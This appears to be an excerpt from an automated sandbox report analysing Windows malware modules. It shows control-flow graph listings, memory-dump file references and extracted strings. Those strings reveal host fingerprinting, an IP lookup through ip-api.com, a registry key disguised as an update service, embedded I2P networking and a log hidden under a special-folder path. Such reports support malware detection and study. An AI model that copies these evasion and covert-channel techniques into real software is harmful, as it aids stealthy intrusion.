7ffb23ad35f5-7ffb23ad35f8 640->645 646 7ffb23ad39e6-7ffb23ad39eb 640->646 641->611 647 7ffb23ad36dd-7ffb23ad373a GetVolumeInformationA 641->647 659 7ffb23ad37a1 642->659 650 7ffb23ad3636-7ffb23ad363c 643->650 651 7ffb23ad3a0e-7ffb23ad3a13 643->651 644->611 653 7ffb23ad39f0-7ffb23ad39f5 645->653 654 7ffb23ad35fe-7ffb23ad3603 645->654 646->611 655 7ffb23ad3837-7ffb23ad3869 call 7ffb23ad1352 647->655 656 7ffb23ad3740-7ffb23ad3766 GetLastError call 7ffb23ad1352 647->656 648->611 649->611 657 7ffb23ad3648-7ffb23ad364d 650->657 658 7ffb23ad363e-7ffb23ad3643 650->658 651->611 653->611 654->611 666 7ffb23ad386b-7ffb23ad3877 strlen 655->666 667 7ffb23ad387d-7ffb23ad3884 655->667 664 7ffb23ad3768 656->664 665 7ffb23ad37a6-7ffb23ad37ac 656->665 657->611 658->611 659->641 668 7ffb23ad38ef-7ffb23ad38f4 664->668 669 7ffb23ad376e-7ffb23ad377b 664->669 671 7ffb23ad3903-7ffb23ad3908 665->671 672 7ffb23ad37b2 665->672 666->667 670 7ffb23ad3949-7ffb23ad394d 666->670 673 7ffb23ad3888-7ffb23ad38e5 call 7ffb23ad1352 667->673 668->611 669->642 670->667 674 7ffb23ad3953-7ffb23ad3957 670->674 671->611 675 7ffb23ad37b4-7ffb23ad37b7 672->675 676 7ffb23ad37eb-7ffb23ad37f1 672->676 683 7ffb23ad38ea 673->683 674->667 680 7ffb23ad395d-7ffb23ad3990 _errno call 7ffb23ae0bd8 _errno 674->680 681 7ffb23ad37b9-7ffb23ad37bc 675->681 682 7ffb23ad37d5-7ffb23ad37db 675->682 678 7ffb23ad37f7-7ffb23ad37fd 676->678 679 7ffb23ad392b-7ffb23ad3930 676->679 686 7ffb23ad3803-7ffb23ad3809 678->686 687 7ffb23ad3935-7ffb23ad393a 678->687 679->611 696 7ffb23ad39a0-7ffb23ad39c3 _errno call 7ffb23ad1352 680->696 697 7ffb23ad3992-7ffb23ad3995 680->697 689 7ffb23ad37c2-7ffb23ad37c5 681->689 690 7ffb23ad390d-7ffb23ad3912 681->690 684 7ffb23ad3921-7ffb23ad3926 682->684 685 7ffb23ad37e1-7ffb23ad37e6 682->685 683->617 684->611 685->611 693 7ffb23ad393f-7ffb23ad3944 686->693 694 7ffb23ad380f-7ffb23ad3814 686->694 687->611 691 7ffb23ad3917-7ffb23ad391c 689->691 692 7ffb23ad37cb-7ffb23ad37d0 689->692 690->611 691->611 692->611 693->611 694->611 696->667 697->673 698 7ffb23ad399b 697->698 698->667
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: f8fc02968b23630bcbc2ef19b2b22130ef80d4e74df1872f80140d4213a9ea3d
                                    • Instruction ID: d7f478b4b005f1d836a248c6bdc1042dc911f2e8fb5fac22c9cf41e93c994473
                                    • Opcode Fuzzy Hash: f8fc02968b23630bcbc2ef19b2b22130ef80d4e74df1872f80140d4213a9ea3d
                                    • Instruction Fuzzy Hash: 13D149E1E0CADB85FA639774EC803BD2290AF47B54F1C41B2D94E276E4DE2DE8458781

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 936 7ff7aabd28fc-7ff7aabd2916 call 7ff7aabd2304 939 7ff7aabd291c-7ff7aabd2931 call 7ff7aabd2283 936->939 940 7ff7aabd2e38 936->940 945 7ff7aabd2933-7ff7aabd2961 939->945 946 7ff7aabd2987 939->946 942 7ff7aabd2e4c-7ff7aabd2e51 940->942 944 7ff7aabd2999-7ff7aabd29b0 call 7ff7aabd2ef2 942->944 950 7ff7aabd29b5-7ff7aabd29c2 944->950 952 7ff7aabd2963-7ff7aabd2968 945->952 953 7ff7aabd296a-7ff7aabd2985 call 7ff7aabd2ef2 945->953 947 7ff7aabd298c-7ff7aabd2997 FreeLibrary 946->947 947->944 949 7ff7aabd29c3-7ff7aabd29fc GetNativeSystemInfo GetWindowsDirectoryA 947->949 954 7ff7aabd2ae0-7ff7aabd2b03 call 7ff7aabd2ef2 949->954 955 7ff7aabd2a02-7ff7aabd2a23 GetLastError call 7ff7aabd2ef2 949->955 952->947 953->947 954->944 962 7ff7aabd2b09-7ff7aabd2b3f call 7ff7aabd9242 954->962 963 7ff7aabd2a43-7ff7aabd2a49 955->963 964 7ff7aabd2a25 955->964 972 7ff7aabd2b45-7ff7aabd2b47 962->972 973 7ff7aabd2bf0-7ff7aabd2c0c call 7ff7aabd2ef2 962->973 963->942 966 7ff7aabd2a4f-7ff7aabd2a55 963->966 967 7ff7aabd2a27-7ff7aabd2a34 964->967 968 7ff7aabd2a39-7ff7aabd2a3e 964->968 970 7ff7aabd2a8e-7ff7aabd2a94 966->970 971 7ff7aabd2a57-7ff7aabd2a5a 966->971 967->968 968->944 976 7ff7aabd2e74-7ff7aabd2e79 970->976 977 7ff7aabd2a9a-7ff7aabd2aa0 970->977 974 7ff7aabd2a5c-7ff7aabd2a5f 971->974 975 7ff7aabd2a78-7ff7aabd2a7e 971->975 972->944 978 7ff7aabd2b4d-7ff7aabd2baa GetVolumeInformationA 972->978 992 7ff7aabd2c11 973->992 979 7ff7aabd2a65-7ff7aabd2a68 974->979 980 7ff7aabd2e56-7ff7aabd2e5b 974->980 981 7ff7aabd2a84-7ff7aabd2a89 975->981 982 7ff7aabd2e6a-7ff7aabd2e6f 975->982 976->944 983 7ff7aabd2aa6-7ff7aabd2aac 977->983 984 7ff7aabd2e7e-7ff7aabd2e83 977->984 986 7ff7aabd2bb0-7ff7aabd2bd6 GetLastError call 7ff7aabd2ef2 978->986 987 7ff7aabd2ca7-7ff7aabd2cd9 call 7ff7aabd2ef2 978->987 988 7ff7aabd2e60-7ff7aabd2e65 979->988 989 7ff7aabd2a6e-7ff7aabd2a73 979->989 980->944 981->944 982->944 990 7ff7aabd2aae-7ff7aabd2ab3 983->990 991 7ff7aabd2ab8-7ff7aabd2abd 983->991 984->944 997 7ff7aabd2c16-7ff7aabd2c1c 986->997 998 7ff7aabd2bd8 986->998 999 7ff7aabd2cdb-7ff7aabd2ce7 strlen 987->999 1000 7ff7aabd2ced-7ff7aabd2cf4 987->1000 988->944 989->944 990->944 991->944 992->972 1001 7ff7aabd2d73-7ff7aabd2d78 997->1001 1002 7ff7aabd2c22 997->1002 1004 7ff7aabd2d5f-7ff7aabd2d64 998->1004 1005 7ff7aabd2bde-7ff7aabd2beb 998->1005 999->1000 1006 7ff7aabd2db9-7ff7aabd2dbd 999->1006 1003 7ff7aabd2cf8-7ff7aabd2d55 call 7ff7aabd2ef2 1000->1003 1001->944 1007 7ff7aabd2c24-7ff7aabd2c27 1002->1007 1008 7ff7aabd2c5b-7ff7aabd2c61 1002->1008 1013 7ff7aabd2d5a 1003->1013 1004->944 1005->973 1006->1000 1010 7ff7aabd2dc3-7ff7aabd2dc7 1006->1010 1011 7ff7aabd2c45-7ff7aabd2c4b 1007->1011 1012 7ff7aabd2c29-7ff7aabd2c2c 1007->1012 1014 7ff7aabd2d9b-7ff7aabd2da0 1008->1014 1015 7ff7aabd2c67-7ff7aabd2c6d 1008->1015 1010->1000 1016 7ff7aabd2dcd-7ff7aabd2e00 _errno call 7ff7aabde4b0 _errno 1010->1016 1019 7ff7aabd2d91-7ff7aabd2d96 1011->1019 1020 7ff7aabd2c51-7ff7aabd2c56 1011->1020 1017 7ff7aabd2c32-7ff7aabd2c35 1012->1017 1018 7ff7aabd2d7d-7ff7aabd2d82 1012->1018 1013->950 1014->944 1021 7ff7aabd2c73-7ff7aabd2c79 1015->1021 1022 7ff7aabd2da5-7ff7aabd2daa 1015->1022 1029 7ff7aabd2e10-7ff7aabd2e33 _errno call 7ff7aabd2ef2 1016->1029 1030 7ff7aabd2e02-7ff7aabd2e05 1016->1030 1024 7ff7aabd2c3b-7ff7aabd2c40 1017->1024 1025 7ff7aabd2d87-7ff7aabd2d8c 1017->1025 1018->944 1019->944 1020->944 1026 7ff7aabd2daf-7ff7aabd2db4 1021->1026 1027 7ff7aabd2c7f-7ff7aabd2c84 1021->1027 1022->944 1024->944 1025->944 1026->944 1027->944 1029->1000 1030->1003 1031 7ff7aabd2e0b 1030->1031 1031->1000
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                                    • API String ID: 3828489143-3798070276
                                    • Opcode ID: a57b692ad12e5eeb41306e7f3187960999aff03a888e3c7662513fb2fc337020
                                    • Instruction ID: 9ba5a621ffd9bae3baf2e56d183d676ea3adf6df110f94757833b3422ac9a61e
                                    • Opcode Fuzzy Hash: a57b692ad12e5eeb41306e7f3187960999aff03a888e3c7662513fb2fc337020
                                    • Instruction Fuzzy Hash: 5FD17971E0FA96C1FAA0BB54E4403B8E360AB20755FD711B6C94E176B0DE2DED868361

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1034 7ffb23b0bc77-7ffb23b0bc97 1035 7ffb23b0bd05-7ffb23b0bd0d 1034->1035 1036 7ffb23b0bc99-7ffb23b0bca1 1034->1036 1037 7ffb23b0bd0f-7ffb23b0bd14 1035->1037 1038 7ffb23b0bd20-7ffb23b0bd36 call 7ffb23b0689b 1035->1038 1039 7ffb23b0bcb0-7ffb23b0bcb8 1036->1039 1040 7ffb23b0bca3-7ffb23b0bcaa 1036->1040 1041 7ffb23b0bd3b-7ffb23b0bd40 1037->1041 1042 7ffb23b0bd16-7ffb23b0bd1b 1037->1042 1047 7ffb23b0c38c-7ffb23b0c39d 1038->1047 1045 7ffb23b0bcbe-7ffb23b0bcc6 1039->1045 1046 7ffb23b0c387 1039->1046 1040->1039 1044 7ffb23b0c0b3-7ffb23b0c0cd call 7ffb23b0689b 1040->1044 1050 7ffb23b0bd6f-7ffb23b0beba call 7ffb23b022f5 call 7ffb23b07400 call 7ffb23b05ec9 1041->1050 1051 7ffb23b0bd42-7ffb23b0bd48 1041->1051 1042->1047 1044->1039 1062 7ffb23b0c0d3-7ffb23b0c0db 1044->1062 1052 7ffb23b0bcdb-7ffb23b0bce6 1045->1052 1053 7ffb23b0bcc8-7ffb23b0bccf 1045->1053 1046->1047 1087 7ffb23b0bec0-7ffb23b0beee call 7ffb23b0d3f2 1050->1087 1088 7ffb23b0c039-7ffb23b0c06e call 7ffb23b03805 1050->1088 1051->1050 1057 7ffb23b0bd4a-7ffb23b0bd6a 1051->1057 1054 7ffb23b0bcec-7ffb23b0bcf5 1052->1054 1055 7ffb23b0c39e-7ffb23b0c3a3 1052->1055 1053->1052 1059 7ffb23b0bcd1-7ffb23b0bcd9 1053->1059 1060 7ffb23b0bcfb-7ffb23b0bd00 1054->1060 1061 7ffb23b0c22d-7ffb23b0c253 1054->1061 1055->1047 1057->1047 1059->1052 1059->1054 1060->1047 1064 7ffb23b0c3a5-7ffb23b0c3aa 1061->1064 1065 7ffb23b0c259-7ffb23b0c260 1061->1065 1066 7ffb23b0c0e1-7ffb23b0c0f2 1062->1066 1067 7ffb23b0c167-7ffb23b0c182 call 7ffb23b0689b call 7ffb23b0b910 1062->1067 1064->1047 1070 7ffb23b0c26f-7ffb23b0c295 GetProcessHeap HeapAlloc 1065->1070 1071 7ffb23b0c262-7ffb23b0c26c 1065->1071 1072 7ffb23b0c10d-7ffb23b0c116 1066->1072 1073 7ffb23b0c0f4-7ffb23b0c10b 1066->1073 1067->1047 1077 7ffb23b0c297-7ffb23b0c2d9 memcpy call 7ffb23b09100 1070->1077 1078 7ffb23b0c309-7ffb23b0c324 call 7ffb23b077a2 1070->1078 1071->1070 1072->1067 1079 7ffb23b0c118-7ffb23b0c120 1072->1079 1073->1067 1073->1072 1096 7ffb23b0c2df 1077->1096 1097 7ffb23b0c378-7ffb23b0c37b 1077->1097 1078->1047 1083 7ffb23b0c122-7ffb23b0c129 1079->1083 1084 7ffb23b0c135-7ffb23b0c140 1079->1084 1083->1084 1091 7ffb23b0c12b-7ffb23b0c133 1083->1091 1092 7ffb23b0c142-7ffb23b0c14a 1084->1092 1093 7ffb23b0c187 call 7ffb23b0b9f4 1084->1093 1109 7ffb23b0befe-7ffb23b0bf0a call 7ffb23b068e2 1087->1109 1110 7ffb23b0bef0-7ffb23b0bef8 1087->1110 1088->1087 1115 7ffb23b0c074-7ffb23b0c087 call 7ffb23b0ea90 1088->1115 1091->1084 1091->1092 1099 7ffb23b0c14c-7ffb23b0c162 call 7ffb23b0689b 1092->1099 1100 7ffb23b0c196-7ffb23b0c1b0 call 7ffb23b0689b 1092->1100 1102 7ffb23b0c18c-7ffb23b0c191 1093->1102 1104 7ffb23b0c2e4-7ffb23b0c2e7 1096->1104 1106 7ffb23b0c33a-7ffb23b0c33c 1097->1106 1099->1047 1120 7ffb23b0c1bc-7ffb23b0c228 call 7ffb23b022f5 call 7ffb23b0689b call 7ffb23b061a2 1100->1120 1121 7ffb23b0c1b2-7ffb23b0c1b7 1100->1121 1102->1047 1104->1047 1114 7ffb23b0c2ed-7ffb23b0c304 GetProcessHeap HeapFree 1104->1114 1111 7ffb23b0c34d-7ffb23b0c35c call 7ffb23b0917d 1106->1111 1112 7ffb23b0c33e-7ffb23b0c346 1106->1112 1129 7ffb23b0bf0c-7ffb23b0bf21 1109->1129 1130 7ffb23b0bf29-7ffb23b0bf3f call 7ffb23b06a68 1109->1130 1110->1109 1116 7ffb23b0c08c-7ffb23b0c0ae memcpy 1110->1116 1111->1096 1131 7ffb23b0c35e-7ffb23b0c36c call 7ffb23b0bc0e 1111->1131 1112->1111 1117 7ffb23b0c348-7ffb23b0c34b 1112->1117 1114->1047 1115->1087 1116->1109 1117->1111 1124 7ffb23b0c326-7ffb23b0c336 call 7ffb23b091ee 1117->1124 1120->1047 1121->1047 1124->1106 1129->1130 1141 7ffb23b0bf41-7ffb23b0bf5d 1130->1141 1142 7ffb23b0bf64-7ffb23b0bfab call 7ffb23b09370 1130->1142 1143 7ffb23b0c37d-7ffb23b0c382 1131->1143 1144 7ffb23b0c36e-7ffb23b0c373 1131->1144 1141->1142 1148 7ffb23b0bfad-7ffb23b0bfb5 1142->1148 1149 7ffb23b0bfdf-7ffb23b0bfe7 1142->1149 1143->1104 1144->1104 1148->1149 1150 7ffb23b0bfb7-7ffb23b0bfd2 call 7ffb23b01290 1148->1150 1151 7ffb23b0c000-7ffb23b0c034 call 7ffb23b061a2 1149->1151 1152 7ffb23b0bfe9-7ffb23b0bffa GetProcessHeap HeapFree 1149->1152 1150->1149 1157 7ffb23b0bfd4-7ffb23b0bfd8 1150->1157 1151->1047 1152->1151 1157->1149
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
                                    • API String ID: 0-4235120829
                                    • Opcode ID: f17b642b60684e6d72e5c52d8b8c935d337f4bcc8085869163eb07bfa546fddb
                                    • Instruction ID: 0e44860421cb8d0983171b35ae9d70cb1fd4ab03cacf3cec4b7331cb86366139
                                    • Opcode Fuzzy Hash: f17b642b60684e6d72e5c52d8b8c935d337f4bcc8085869163eb07bfa546fddb
                                    • Instruction Fuzzy Hash: B4127FA9A087C285EA628F34E8C83BD63A0EB44754F180276DADD677E5EF3CE545C700

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strlen$strcat$HandleLibraryLoadModule
                                    • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                                    • API String ID: 1893813203-492052463
                                    • Opcode ID: 4fe1bcfedec6960b391f1dc07c002b4a6640761449cb7f7938ea02e167745d31
                                    • Instruction ID: ec461aa30ec3015ffebce42986dbe7e0f0d30b3931d3463017782849a5b7b927
                                    • Opcode Fuzzy Hash: 4fe1bcfedec6960b391f1dc07c002b4a6640761449cb7f7938ea02e167745d31
                                    • Instruction Fuzzy Hash: 157191B9A0CBC291EB229F25E8983EE6391AB85780F480171DACD6B799DF7CD505C740

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1249 7ffb2273c9fc-7ffb2273ca24 InitializeCriticalSectionAndSpinCount 1250 7ffb2273cb50-7ffb2273cb71 GetLastError call 7ffb2273c852 1249->1250 1251 7ffb2273ca2a-7ffb2273ca5e call 7ffb2273b930 call 7ffb2273466b 1249->1251 1256 7ffb2273cb92-7ffb2273cb98 1250->1256 1257 7ffb2273cb73 1250->1257 1264 7ffb2273ca64-7ffb2273ca7b strlen 1251->1264 1265 7ffb2273cb29-7ffb2273cb41 call 7ffb2273c852 1251->1265 1262 7ffb2273cb9e-7ffb2273cba4 1256->1262 1263 7ffb2273cc5b 1256->1263 1259 7ffb2273cc51-7ffb2273cc56 1257->1259 1260 7ffb2273cb79-7ffb2273cb86 1257->1260 1259->1265 1260->1256 1266 7ffb2273cbd0-7ffb2273cbd3 1262->1266 1267 7ffb2273cba6-7ffb2273cbac 1262->1267 1272 7ffb2273cc65-7ffb2273cc6a 1263->1272 1268 7ffb2273ca7d-7ffb2273ca80 1264->1268 1269 7ffb2273ca93-7ffb2273ca96 1264->1269 1283 7ffb2273cb46-7ffb2273cb4f 1265->1283 1273 7ffb2273cbed-7ffb2273cbf3 1266->1273 1274 7ffb2273cbd5-7ffb2273cbd8 1266->1274 1270 7ffb2273cbb2-7ffb2273cbb8 1267->1270 1271 7ffb2273cc79-7ffb2273cc7e 1267->1271 1268->1269 1276 7ffb2273ca82-7ffb2273ca8f strlen 1268->1276 1279 7ffb2273cab8-7ffb2273cb01 strlen fopen 1269->1279 1280 7ffb2273ca98-7ffb2273cab2 strcat strlen 1269->1280 1277 7ffb2273cbbe-7ffb2273cbc4 1270->1277 1278 7ffb2273cc83-7ffb2273cc88 1270->1278 1271->1265 1272->1265 1284 7ffb2273cc6f 1273->1284 1285 7ffb2273cbf5-7ffb2273cbfa 1273->1285 1281 7ffb2273cbda-7ffb2273cbdd 1274->1281 1282 7ffb2273cc47 1274->1282 1276->1269 1286 7ffb2273cbff-7ffb2273cc04 1277->1286 1287 7ffb2273cbc6-7ffb2273cbcb 1277->1287 1278->1265 1288 7ffb2273cc1d-7ffb2273cc38 call 7ffb2273c852 1279->1288 1289 7ffb2273cb07-7ffb2273cb23 call 7ffb2273c852 1279->1289 1280->1279 1281->1272 1290 7ffb2273cbe3-7ffb2273cbe8 1281->1290 1282->1259 1284->1271 1285->1265 1286->1265 1287->1265 1288->1265 1289->1265 1295 7ffb2273cc8d-7ffb2273cca7 call 7ffb2273c852 1289->1295 1290->1265 1295->1283
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                                    • API String ID: 3395718042-1794035234
                                    • Opcode ID: 7ea5a7862861d5ea6c841cfaceadcf6219b2eeffedc7ed65e0db8ba229a4bfac
                                    • Instruction ID: 47a5b3339ff0257f473b8896456802e72b656f04967a63fa6e25ed21d43640bf
                                    • Opcode Fuzzy Hash: 7ea5a7862861d5ea6c841cfaceadcf6219b2eeffedc7ed65e0db8ba229a4bfac
                                    • Instruction Fuzzy Hash: F2512DE0F1C6D791FA129B74EC913B96260AF0B744F54503ACA0DC62B2DEEDAD95C342

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1298 7ffb22769f6c-7ffb22769f94 InitializeCriticalSectionAndSpinCount 1299 7ffb2276a0c0-7ffb2276a0e1 GetLastError call 7ffb22769dc2 1298->1299 1300 7ffb22769f9a-7ffb22769fce call 7ffb22764ac0 call 7ffb227689db 1298->1300 1305 7ffb2276a102-7ffb2276a108 1299->1305 1306 7ffb2276a0e3 1299->1306 1313 7ffb2276a099-7ffb2276a0b1 call 7ffb22769dc2 1300->1313 1314 7ffb22769fd4-7ffb22769feb strlen 1300->1314 1311 7ffb2276a10e-7ffb2276a114 1305->1311 1312 7ffb2276a1cb 1305->1312 1308 7ffb2276a1c1-7ffb2276a1c6 1306->1308 1309 7ffb2276a0e9-7ffb2276a0f6 1306->1309 1308->1313 1309->1305 1315 7ffb2276a140-7ffb2276a143 1311->1315 1316 7ffb2276a116-7ffb2276a11c 1311->1316 1317 7ffb2276a1d5-7ffb2276a1da 1312->1317 1329 7ffb2276a0b6-7ffb2276a0bf 1313->1329 1321 7ffb22769fed-7ffb22769ff0 1314->1321 1322 7ffb2276a003-7ffb2276a006 1314->1322 1318 7ffb2276a15d-7ffb2276a163 1315->1318 1319 7ffb2276a145-7ffb2276a148 1315->1319 1323 7ffb2276a122-7ffb2276a128 1316->1323 1324 7ffb2276a1e9-7ffb2276a1ee 1316->1324 1317->1313 1330 7ffb2276a1df 1318->1330 1331 7ffb2276a165-7ffb2276a16a 1318->1331 1327 7ffb2276a14a-7ffb2276a14d 1319->1327 1328 7ffb2276a1b7 1319->1328 1321->1322 1332 7ffb22769ff2-7ffb22769fff strlen 1321->1332 1325 7ffb2276a028-7ffb2276a071 strlen fopen 1322->1325 1326 7ffb2276a008-7ffb2276a022 strcat strlen 1322->1326 1333 7ffb2276a12e-7ffb2276a134 1323->1333 1334 7ffb2276a1f3-7ffb2276a1f8 1323->1334 1324->1313 1337 7ffb2276a18d-7ffb2276a1a8 call 7ffb22769dc2 1325->1337 1338 7ffb2276a077-7ffb2276a093 call 7ffb22769dc2 1325->1338 1326->1325 1327->1317 1339 7ffb2276a153-7ffb2276a158 1327->1339 1328->1308 1330->1324 1331->1313 1332->1322 1335 7ffb2276a16f-7ffb2276a174 1333->1335 1336 7ffb2276a136-7ffb2276a13b 1333->1336 1334->1313 1335->1313 1336->1313 1337->1313 1338->1313 1344 7ffb2276a1fd-7ffb2276a217 call 7ffb22769dc2 1338->1344 1339->1313 1344->1329
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
